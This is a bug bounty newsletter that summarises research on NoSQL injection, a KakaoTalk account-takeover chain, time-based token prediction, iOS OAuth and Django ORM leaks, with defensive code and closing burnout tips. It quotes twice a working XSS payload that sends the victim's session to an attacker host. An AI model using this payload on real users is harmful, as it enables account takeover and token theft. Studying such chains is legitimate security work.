[HackerNotes Ep. 77] Bug Bounty Mental - Practical Tips for Staying Sharp & Motivated
We've got fresh writeups including some MongoDB injections, ORMs, and exploits in Kakao and iOS before pivoting into staying motivated and avoiding burnout while hunting.
Hacker TLDR;
MongoDB NoSQL Injection Techniques: Stellar research from Soroush detailing some MongoDB NoSQL injection techniques via aggregation pipelines. Some takeaways:
With aggregation pipelines, it’s possible to bypass the limitations of single-collection injections.
Monitor aggregate parameters in JSON arrays for $match and $lookup. Add parameters like $lookup, $unionWith, and $match to your wordlist for testing. Any errors or hits on these might give a hint to a potential NoSQL injection.
Check out the full research here: https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/
1 Click ATO - KakaoTalk: A solid exploit chain on KakaoTalk abusing deep links, open redirects, XSS leading to ATO. Some takeaways:
Exploit chain: Deep link → open redirect → XSS → redirect to attacker-controlled domain → Harvest session material
Payload:
kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">
Research URL: https://stulle123.github.io/posts/kakaotalk-account-takeover/
Time-Based Secret Leaks: New research on leaking secrets via time-based vectors, with a new tool being dropped, ‘reset-tolkien’, to aid in exploiting these types of bugs.
Practical Tips for Staying Sharp & Motivated in Bug Bounty: This section is way too big to summarise here, so scroll to the end for the in-depth version, but some of the tips dropped below for motivation and long-term success in bug bounty include:
Avoiding the highs and lows vs riding them
Diet
Competition and Accountability
Working on something you’re interested in
GADGETS
Stay on the same target longer than you think you should
Goals & celebrations for success
Working with high-quality teams with fast communication and threat model validation
Collaboration
Routinely reduce the friction in your workflow (ask yourself the question - where is the friction and how can I reduce it?)
Burnout avoidance
MongoDB NoSQL Injection Techniques
Soroush delivers more top-notch research again. This time we have some techniques on MongoDB NoSQL injection - if you don’t already follow this guy's Twitter, it’s a safe bet if you want good research.
His latest research highlights the use of MongoDB aggregates to exploit NoSQL injections, allowing attackers to read from, add to, and update data in multiple collections. By leveraging aggregation pipelines and stages like $lookup and $unionWith, attackers can bypass limitations typically associated with single-collection injections. Aggregates are a means of processing documents in stages: filtering them, reshaping them, joining them and that sort of thing.
With NoSQL injection, impact is sometimes limited by the collection the injection lands in - if you want to escalate further, the methods below can (depending on the context) be used to go beyond your collection and read others.
Check out the full research here: https://soroush.me/blog/2024/06/mongodb-nosql-injection-with-aggregation-pipelines/
Some labs have been linked towards the end of the research if you’d like to get hands-on with these types of attacks.
Some takeaways from this one:
Monitor aggregate parameters in JSON arrays for $match and $lookup. Add parameters like $lookup, $unionWith, and $match to your wordlist for testing. Any errors or hits on these might give a hint to a potential NoSQL injection.
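From the defender's side, the takeaway is that a pipeline built from client JSON must be checked stage by stage before it reaches aggregate(), including the sub-pipelines that $lookup, $unionWith and $facet can carry. The validator below is an added example, not code from Soroush's research; the stage allow-list and the products endpoint are constructed for illustration.

```python
import json

# Stages that reach outside the collection the query was meant to touch
# (the ones the research uses to escape a single-collection injection).
CROSS_COLLECTION_STAGES = {"$lookup", "$unionWith", "$graphLookup", "$merge", "$out"}
# Stages a normal read-only endpoint legitimately needs (constructed allow-list).
ALLOWED_STAGES = {"$match", "$project", "$sort", "$limit", "$skip"}


def find_unsafe_stages(pipeline, path="pipeline"):
    """Walk an aggregation pipeline (parsed JSON) and return a list of
    (json_path, stage_name) for every stage not on the allow-list.
    Nested pipelines inside $lookup/$unionWith/$facet are walked too,
    since a $unionWith hidden inside a $lookup is still a cross-collection read."""
    findings = []
    if not isinstance(pipeline, list):
        return [(path, "<pipeline is not an array>")]
    for i, stage in enumerate(pipeline):
        here = f"{path}[{i}]"
        if not isinstance(stage, dict) or len(stage) != 1:
            findings.append((here, "<malformed stage>"))
            continue
        (name, body), = stage.items()
        if name not in ALLOWED_STAGES:
            findings.append((here, name))
        # Some stages carry their own sub-pipeline; recurse into it.
        if isinstance(body, dict):
            if "pipeline" in body:
                findings += find_unsafe_stages(body["pipeline"], f"{here}.{name}.pipeline")
            if name == "$facet":
                for facet, sub in body.items():
                    findings += find_unsafe_stages(sub, f"{here}.$facet.{facet}")
    return findings


def build_product_pipeline(user_json):
    """Hypothetical server-side builder: client-supplied stages are validated
    before being appended to the server's own $match. Anything outside the
    allow-list raises, so it never reaches collection.aggregate()."""
    stages = json.loads(user_json)
    bad = find_unsafe_stages(stages)
    if bad:
        raise ValueError(f"rejected pipeline stages: {bad}")
    return [{"$match": {"category": "books"}}] + stages
```

Operator-level checks inside $match (for example $where or $expr) are a separate concern and are not covered by this stage-level walk.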
1 Click ATO - KakaoTalk
KakaoTalk is the most popular chat app in South Korea. A recent exploit chain demonstrated a vulnerability starting with a deep link capable of opening arbitrary URLs with JavaScript enabled.
It’s a cool exploit chain: it starts with a deep link that could be used to open some arbitrary URLs, and it has JavaScript enabled. Equally, if you hit a specific URL scheme, it will open a set URL with something appended to the path, so example://host would take you to example.com/host/
This was abused and chained with an open redirect which permitted redirects to any subdomain of the root domain. During this process, they noticed the auth token gets sent as a header, regardless of the domain.
Using some Google dorks, they identified some candidate subdomains to get an XSS; one of these searches flagged a URL which looked like it contained a DOM invader canary. Funnily enough it was a canary, and led them to an XSS!
So, with all these parts, the exploit chain looks like:
Deep link → open redirect → XSS → redirect to an attacker-controlled domain → auth token gets sent
This means as an attacker, you send them a link through a chat, the link is a deep link which first hits the open redirect, which redirects to the subdomain which pops the XSS, which is used to redirect to the attacker-controlled page which then harvests the auth token!
The final payload looks like:
kakaotalk://buy/auth/0/cleanFrontRedirect?returnUrl=https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');">
They break the payload down in the writeup:
kakaotalk://buy fires up CommerceBuyActivity
/auth/0/cleanFrontRedirect?returnUrl= “compiles” to https://buy.kakao.com/auth/0/cleanFrontRedirect?returnUrl= and redirects to any kakao.com domain
https://m.shoppinghow.kakao.com/m/product/Q24620753380/q: had the XSS issue
"><img src=x onerror="document.location=atob('aHR0cDovLzE5Mi4xNjguMTc4LjIwOjU1NTUv');"> is the XSS payload. We had to Base64 encode http://192.168.178.20:5555/ to bypass some sanitization checks.
The full writeup for this one can be found here: https://stulle123.github.io/posts/kakaotalk-account-takeover/
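The weak link the writeup describes is a returnUrl check that trusts every subdomain of the root domain, so one XSS on any of them becomes a redirect target for the session material. The two checks below are an added example, not code from the writeup or from Kakao: the root domain is the one named in the payload, and the exact-host allow-list is constructed for illustration.

```python
from urllib.parse import urlsplit

ROOT_DOMAIN = "kakao.com"
# Exact hosts the redirect may land on (constructed allow-list, not Kakao's).
ALLOWED_HOSTS = {"buy.kakao.com", "accounts.kakao.com"}


def weak_is_allowed(url):
    """The kind of check the writeup describes: any subdomain of the root
    domain is trusted, so an XSS on m.shoppinghow.kakao.com is 'allowed'."""
    host = urlsplit(url).hostname or ""
    return host == ROOT_DOMAIN or host.endswith("." + ROOT_DOMAIN)


def strict_is_allowed(url):
    """Hardened check: https only, no userinfo trick (https://good@evil),
    and the hostname must be on the exact allow-list, no wildcard subdomains."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    if parts.scheme != "https" or parts.username is not None:
        return False
    return parts.hostname in ALLOWED_HOSTS


def safe_return_url(url, fallback="https://buy.kakao.com/"):
    """Redirect only to a vetted host; otherwise fall back to a fixed page."""
    return url if strict_is_allowed(url) else fallback


# Constructed: the returnUrl from the payload above, with the XSS removed.
XSS_HOST_URL = "https://m.shoppinghow.kakao.com/m/product/Q24620753380/q:"
```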
Time-Based Secret Leaks
If you’ve done any form of code review or had a look at some tokens associated with password reset flows or any secret-based transaction, you may have come across the system time or something similar being used as a seed for that function.
This research dives into the world of time-based token generation, particularly focusing on PHP's uniqid and MongoDB's ObjectID. The TL;DR is that these two methods in particular can be abused, using the server's Date header, to predict and manipulate token values.
Any time you’re performing time-based attacks, there is a standard header which should be returned with every response: Date. It is the time the server thinks it is at the moment it handled your request, and it can be used to perform various operations.
This research was dropped with a tool which takes the current date from the server, a token and data about your account which are commonly used as seeds, and it provides a bunch of different token formats back, including:
base32
base64
urlencode
hexint
hexstr: ASCII integer encoding
uniqid: the PHP function uniqid previously studied
uuidv1: the format of a time-based UUID Version 1
shortuuid: a popular UUID encoding function
mongodb_objectid: the Mongo DB data format studied above
datetime: the encoding of a date from a custom date format
datetimeRFC2822: encoding a date using the format from the RFC2822 standard
md5
sha1
sha224
sha256
sha384
sha512
sha3_224
sha3_256
sha3_384
sha3_512
blake_256
blake_512
You can check the tool made off the back of this research here: https://github.com/AethliosIK/reset-tolkien and the full research article here: https://www.aeth.cc/public/Article-Reset-Tolkien/secret-time-based-article-en.html
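To see why these two formats are a problem in a reset flow, it helps to pull the clock back out of a token and compare it with the Date header. The helpers below are an added example, not reset-tolkien's code; the sample token values are constructed for illustration, and make_reset_token shows the non-predictable alternative.

```python
from email.utils import parsedate_to_datetime
import secrets

# Constructed samples: both encode 1718000000 (Mon, 10 Jun 2024 06:13:20 GMT).
SAMPLE_UNIQID = "6666998012345"            # sprintf('%08x%05x', 0x66669980, 0x12345)
SAMPLE_OBJECTID = "66669980" + "00" * 8    # 4-byte timestamp + 8 constructed bytes


def uniqid_timestamp(token):
    """PHP uniqid() without more_entropy is sprintf('%08x%05x', sec, usec):
    13 hex chars that are nothing but the clock. Returns (seconds, microseconds)."""
    if len(token) != 13 or any(c not in "0123456789abcdef" for c in token):
        raise ValueError("not a plain uniqid() value")
    return int(token[:8], 16), int(token[8:], 16)


def objectid_timestamp(oid):
    """MongoDB ObjectId: 12 bytes, the first 4 are a big-endian Unix time."""
    raw = bytes.fromhex(oid)
    if len(raw) != 12:
        raise ValueError("not an ObjectId")
    return int.from_bytes(raw[:4], "big")


def server_time_from_date_header(date_header):
    """Parse an HTTP Date header (RFC 2822 / RFC 7231 format) to Unix seconds."""
    return int(parsedate_to_datetime(date_header).timestamp())


def embedded_time_gap(token_seconds, date_header):
    """Distance between the clock embedded in a token and the server's own
    clock. A gap of a few seconds is the signature of a time-seeded token;
    a code reviewer or tester can use this to confirm the finding."""
    return abs(token_seconds - server_time_from_date_header(date_header))


def make_reset_token():
    """What a reset token should be instead: 32 bytes from the OS CSPRNG,
    with no relation to the clock at all."""
    return secrets.token_urlsafe(32)
```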
Interestingly, I think this year is going to be a ripe spot for time-based attacks. James Kettle's upcoming research focuses on practical web-based timing attacks - https://x.com/albinowax/status/1796526507013378073 - being dropped at Black Hat USA and Defcon.
Mobile OAuth Attacks
All iOS users have probably seen the OAuth prompt ‘APP wants to use ‘App1’ to sign in’ when using an app that depends on OAuth for authentication. This research by Julien Ahrens and Evan Connelly highlights how vulnerabilities in iOS's handling of OAuth can lead to account hijacking through malicious apps.
By exploiting custom URL schemes and ASWebAuthenticationSession, attackers can intercept OAuth authorization codes without user interaction using parameters such as prompt=none. The research demonstrates that this can be abused seamlessly, bypassing traditional OAuth protections via the prompt=none setting.
It’s worth noting that a pre-req for this is a malicious app being installed, but once installed, it can perform account takeovers on vulnerable apps. The research deep dives into the code behind ASWebAuthenticationSession and some interesting behaviours uncovered along the way; we recommend checking out the full writeup.
Takeaways:
Prompt=None: This parameter can be abused to bypass user interactions.
URL Scheme Registration: Apps can misuse URL schemes, leading to potential hijacks.
Fix: Use universal links and require user consent to prevent these attacks.
The full writeup for this one can be found here: https://evanconnelly.github.io/post/ios-oauth/
ORM Leaks
This was some pretty neat research from Elttam on Django’s ORM. If you aren’t familiar with an ORM, it’s essentially a way to design and interact with databases solely in code instead of SQL; adding a layer of abstraction and making it quicker and easier to interact with databases.
With this, ORMs are generally regarded as safe and very rarely see things such as SQLi. This research introduces a new vulnerability class, known as ORM Leaks. This new class abuses insecure uses of ORMs that do not validate inputs when used with certain ORM functions, allowing a means of data leakage.
The conditions for an ORM leak, taken from the blog:
The attacker can control the column to filter results.
The ORM supports an operator that matches a fragment of a value. Suitable operators use the LIKE SQL condition in the generated query, perform regex matching with attacker-controlled patterns or allow comparison operators such as < and >.
The attacker can control the operator for a filter.
The queried model has a sensitive field that was not intended to be leaked.
The research details quite a few test cases and different scenarios whereby an ORM leak can arise, including:
In all the examples given, if you're able to supply a JSON blob which gets passed into the ORM's filter functions, you can potentially supply filter chains. This provides a means of supplying arbitrary parameters, allowing you to hit completely separate fields, and even fields on related models.
Some of the POCs provided leak via filters on a character-by-character basis in a boolean-like fashion, with some added vectors for ReDoS-based conditions which can also be used to leak from the ORM. Always fun to watch in a POC gif.
Once again, we’ve run into problems when we can supply arbitrary parameters to a function - very similar to the Reflection or indirect method invocation we discussed in episode 72 regarding the GitHub Enterprise send() bug. This also resembles a similar behaviour to GraphQL, where you can reference any field in any related object and filter on any field.
It's interesting how these abstractions are usually praised for the benefit of added security, only for them to be flipped on their heads over time.
Check the full writeup out here: https://www.elttam.com/blog/plormbing-your-django-orm/#content
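The pattern that makes every condition above true at once is `Model.objects.filter(**request_json)`: the client picks the column, the lookup and, via `__`, the related model. The checker below is an added example, not Elttam's code or Django's; the User model fields and their permitted lookups are a constructed allow-list, and the logic runs without Django installed.

```python
# Fields the endpoint is meant to filter on, with the lookups each may use
# (constructed allow-list for a hypothetical User model). Nothing here lets
# a caller match a fragment of a value or compare against a sensitive column.
ALLOWED_FILTERS = {
    "username": {"exact", "iexact"},
    "is_active": {"exact"},
    "date_joined": {"gte", "lte"},
}

# Lookups that satisfy the research's second condition: fragment matching
# (LIKE), regex, or ordering comparisons. Useful for logging what was tried.
LEAKY_LOOKUPS = {"contains", "icontains", "startswith", "istartswith",
                 "endswith", "iendswith", "regex", "iregex",
                 "lt", "lte", "gt", "gte", "range"}


def check_filter_key(key):
    """Return None if a Django-style filter key is acceptable, else the reason
    it is rejected. A key is field[__field...][__lookup]; '__' also walks
    relations, which is how a leak reaches columns on other models."""
    field, *rest = key.split("__")
    if field not in ALLOWED_FILTERS:
        return f"field '{field}' is not filterable"
    if len(rest) > 1:
        return f"relation traversal or transform in '{key}' is not allowed"
    lookup = rest[0] if rest else "exact"
    if lookup not in ALLOWED_FILTERS[field]:
        kind = "leaky lookup" if lookup in LEAKY_LOOKUPS else "lookup"
        return f"{kind} '{lookup}' not allowed on '{field}'"
    return None


def safe_filter_kwargs(user_filters):
    """Replacement for passing request JSON straight into .filter(**kwargs):
    returns the kwargs only if every key passes, otherwise raises with every
    offending key so the rejection can be logged and alerted on."""
    problems = {k: r for k in user_filters if (r := check_filter_key(k))}
    if problems:
        raise ValueError(problems)
    return dict(user_filters)
```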
Practical Tips for Staying Sharp & Motivated in Bug Bounty
If you’ve hunted for an extended period, or even if you’re a beginner, you have probably faced the volatility of bug bounty - things being downgraded, mass closed, misunderstood or duped. It can be incredibly tough to deal with the mental aspect of this, and it can lead to burnout quite quickly if it isn’t managed properly.
The guys went through and covered some practical tips for maintaining motivation when hunting in the long term:
Avoiding the highs and lows vs riding them
Getting your hopes up? Getting excited when you pop something before you know if it is a dupe or not?
The rush of finding a bug is pretty intense, especially if you’re new. And we’re all probably guilty of getting a bit too excited before it’s even reported. Being able to manage this and have the mindset of ‘no rewards until it's triaged/paid’ will pay massive dividends from a burnout and even mental health perspective. This will take time and discipline to get right - I myself am going through this process.
Equally, dupes. Although it can feel like a loss, and we’re all gutted if we dupe on a bug, you still did find a valid bug which was accepted by a program. You might not have gotten paid for it but in terms of development and proof of ability, you still found a bug. That shouldn’t be marked as a loss in your book.
Let's jump into some others.
Diet
The right diet, right sleep and right meal timings will dramatically alter your performance. Getting this locked down will help you stay in the zone longer, and if you stay in the zone longer, you will be able to hunt for longer.
Competition and Accountability
A lot of people thrive off of the competition aspect of bug bounty - the leaderboards, the LHEs, the awards etc. If you’re one of these people, use that to your advantage to get that extra juice when you need to deliver.
Working on something you’re interested in
Hitting a target, specific functionality, or an area of research or bug class you’re interested in will go a long way. Using a natural pull towards something that intrigues you will, by definition, feel easier to maintain and go after. Take note of the things that interest you and find a target that matches this.
GADGETS
A gadget is another step closer to finding a bug. If you’re hunting on a hardened target, noting down and viewing a gadget as a win is especially important to craft more complex and bigger exploit chains.
Equally, it's important to remember as a black-box bug bounty hunter, you have to explore EVERY avenue to maximize your hit rate as 98% of the time, you’ll be failing or trying attack vectors that don’t work. Noting weird behaviours and things that might work is key.
Stay on the same target longer than you think you should
Force yourself to look at it from a different angle, and once you’ve done this a few times and built this ability, you realise you miss things in the app everywhere. Doing this a few times on a target you’re familiar with will help you craft new vectors, and new ideas and help with a new perspective.
Take videos or voice notes brain dumping on a target to watch when you start looking at that target again. This will help you prime yourself and get back in the zone for that target.
Goals & celebrations for success
If you’ve crushed something, make sure to celebrate it. Equally, setting goals when hunting which are realistic and permitting yourself to celebrate when you’ve hit them is a massive incentive to help prevent burnout. Even if you did something that wasn’t on your to-do list or goal list for that day and it's relevant, note it down and tick it off for a sense of accomplishment.
Working with high-quality teams with fast communication and threat model validation
There’s nothing worse than making a complete POC, with a beautiful exploit chain crafted, and the team doesn’t appreciate it or understand it. Working with bad programs can put a bad taste in your mouth if you’ve spent a lot of personal time hunting, and can even put you off hunting for good. Finding good programs that work for you - ones whose threat model you understand, and whose triage is good quality with reasonable response times - can be a massive boost to morale and hunting output.
Collaboration
Networking in the community, collabing on bugs, and escalating your pal's bugs are all great ways to stay motivated. I myself have done this a bit and had fun during the AWC - it makes a nice change to the solo nature of hunting and gets the knowledge flowing, ideas bouncing and gadgets going.
Equally, finding Discords such as the Critical Thinking Discord channel will help with this a lot.
Routinely reduce the friction in your workflow (ask yourself the question - where is the friction and how can I reduce it?)
This is a good one. One gripe I personally had was with JS extraction - a few bookmarks later and a day of scripting, it saves me a lot of time on each target I look at now. If you find yourself context switching from tools, stopping hacking, starting hacking, a bit all over the place, identify where this happens and try to find tooling or a better process for that. These small changes compound over time.
Burnout avoidance
Allowing yourself to take breaks
If you’re your own boss remind yourself one of the reasons you chose Bug Bounty is for the flexibility - you can take breaks, you can have sick days and you can sometimes not feel up to it. That’s okay, and not letting yourself do that will probably give you less flexibility than before and lead to quicker burnout.
Intrinsic (or at least stable, self-worth indicator)
DO NOT put your self-worth into hacking. I think this is quite common among new hunters: the idea that if you don’t find a bug on X target in X time you’re a bad hacker and should feel bad about it. This isn’t true, and self-worth shouldn’t be tied to bug bounty output.
Having some sort of routine (whether it is work from 12 am-8 am or 9-5)
If you switch from hobbyist to full-time hunter, it changes the relationship you have with bug bounty. Having a solid and clear separation of when you start hacking and when you stop hacking will help maintain a structure long-term, and not give you the feeling of a never-ending to-do list or to-hack list.
Some solid advice and takeaways from this week's pod!
As always, keep hacking!